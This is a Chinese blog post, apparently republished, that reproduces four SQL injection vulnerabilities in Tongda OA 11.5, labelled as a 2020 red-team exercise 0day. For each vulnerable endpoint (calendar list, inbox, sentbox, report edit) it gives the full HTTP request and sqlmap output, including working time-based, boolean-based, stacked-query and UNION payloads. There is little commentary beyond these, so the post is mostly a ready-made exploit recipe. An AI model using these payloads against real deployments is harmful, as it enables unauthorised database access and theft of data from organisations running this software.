通达OA11.5漏洞复现_2020HW_0day

通达OA11.5漏洞复现_2020HW_0day

原文链接

1.SQL注入1

在【日程管理】->【查询日程】位置

POST /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1
Host: 192.168.184.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.184.139/general//calendarArrange/calendarArrange.php
Content-Length: 69
Cookie: PHPSESSID=a94j8pel3r8b1idtmd50ro8760; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=62b732f8; _csrf=5385866953c7f651f3e333549e332c8a3681787c5e27714e207628997c560ef3a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22XaoEpsYBGEQCHrj8aTAiwqICdEDQBP1U%22%3B%7D
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: close

view=month&starttime=1595779200&endtime=1599408000&callback=undefined
sqlmap identified the following injection point(s) with a total of 172 HTTP(s) requests:
---
Parameter: starttime (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: view=month&starttime=1595779200') AND (SELECT 9275 FROM (SELECT(SLEEP(5)))UPQR) AND ('MHNP'='MHNP&endtime=1599408000&callback=undefined
---

2.SQL注入2

在【个人信息】->【收件箱】位置
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-W5LqlvVe-1598261812526)(images/oa_02.png)]

GET /general/email/inbox/get_index_data.php?timestamp=&curnum=0&pagelimit=10&total=&boxid=0&orderby=SEND_TIME&asc=0&keyword=&emailtype=ALLMAIL&boxname=inbox&tag= HTTP/1.1
Host: 192.168.184.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://192.168.184.139/general/email/inbox/?BOX_ID=0&boxname=inbox0&boxid=0
Cookie: USER_NAME_COOKIE=chenqiang; OA_USER_ID=chenqiang; SID_1=62b732f8; _csrf=5385866953c7f651f3e333549e332c8a3681787c5e27714e207628997c560ef3a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22XaoEpsYBGEQCHrj8aTAiwqICdEDQBP1U%22%3B%7D; PHPSESSID=aomj53p0nd8cosoem8bmnj0pj1; SID_15=1e1177a1
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: close

GET parameter 'orderby' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 2322 HTTP(s) requests:
---
Parameter: orderby (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: timestamp=&curnum=0&pagelimit=10&total=&boxid=0&orderby=1 RLIKE (SELECT (CASE WHEN (5365=5365) THEN 1 ELSE 0x28 END))&asc=0&keyword=&emailtype=ALLMAIL&boxname=inbox&tag=
---

3.SQL注入3

在【个人信息】->【已发送】位置
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8FtMfN6Z-1598261812528)(images/oa_03.png)]

GET /general/email/sentbox/get_index_data.php?timestamp=&curnum=0&pagelimit=10&total=&boxid=0&orderby=SEND_TIME&asc=0&keyword=&emailtype=ALLMAIL&boxname=sentbox&tag= HTTP/1.1
Host: 192.168.184.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://192.168.184.139/general/email/sentbox/?BOX_ID=0
Cookie: USER_NAME_COOKIE=chenqiang; OA_USER_ID=chenqiang; SID_1=62b732f8; _csrf=5385866953c7f651f3e333549e332c8a3681787c5e27714e207628997c560ef3a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22XaoEpsYBGEQCHrj8aTAiwqICdEDQBP1U%22%3B%7D; PHPSESSID=aomj53p0nd8cosoem8bmnj0pj1; SID_15=1e1177a1
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: close

sqlmap identified the following injection point(s) with a total of 4238 HTTP(s) requests:
---
Parameter: orderby (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: timestamp=&curnum=0&pagelimit=10&total=&boxid=0&orderby=SEND_TIME RLIKE (SELECT (CASE WHEN (1977=1977) THEN 0x53454e445f54494d45 ELSE 0x28 END))&asc=0&keyword=&emailtype=ALLMAIL&boxname=sentbox&tag=
---

4.SQL注入4

在【报表中心】->【报表管理】->【编辑】位置
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Kldna4Er-1598261812533)(images/oa_04.png)]

报表类型必须是统计表

GET /general/appbuilder/web/report/repdetail/edit?id=59 HTTP/1.1
Host: 192.168.184.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.184.139/general/appbuilder/web/report/pivottable?reportId=59&module=&datasetType=
Cookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_15=f90ca368; PHPSESSID=i32aipuse2amh2q7rslgelqoq6; SID_1=8a2db6d3; _csrf=f60f04598987f60abc379b373511b85bc6b8de91ca802171a1389685310f531ea%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%221HbuF2AqpYEDuzstqpCRj_m8Kq7i4d2f%22%3B%7D
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: close

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 176 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=59) AND 9703=9703 AND (5056=5056

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=59);SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=59) AND (SELECT 5594 FROM (SELECT(SLEEP(5)))Icvz) AND (8135=8135

    Type: UNION query
    Title: Generic UNION query (NULL) - 56 columns
    Payload: id=-1908) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176626a71,0x654f42564571706c506b466967726f4f474a5a43687954736955516653777244716e557552666158,0x717a6a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---

待续……

乾坤未定,你我皆是黑马

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值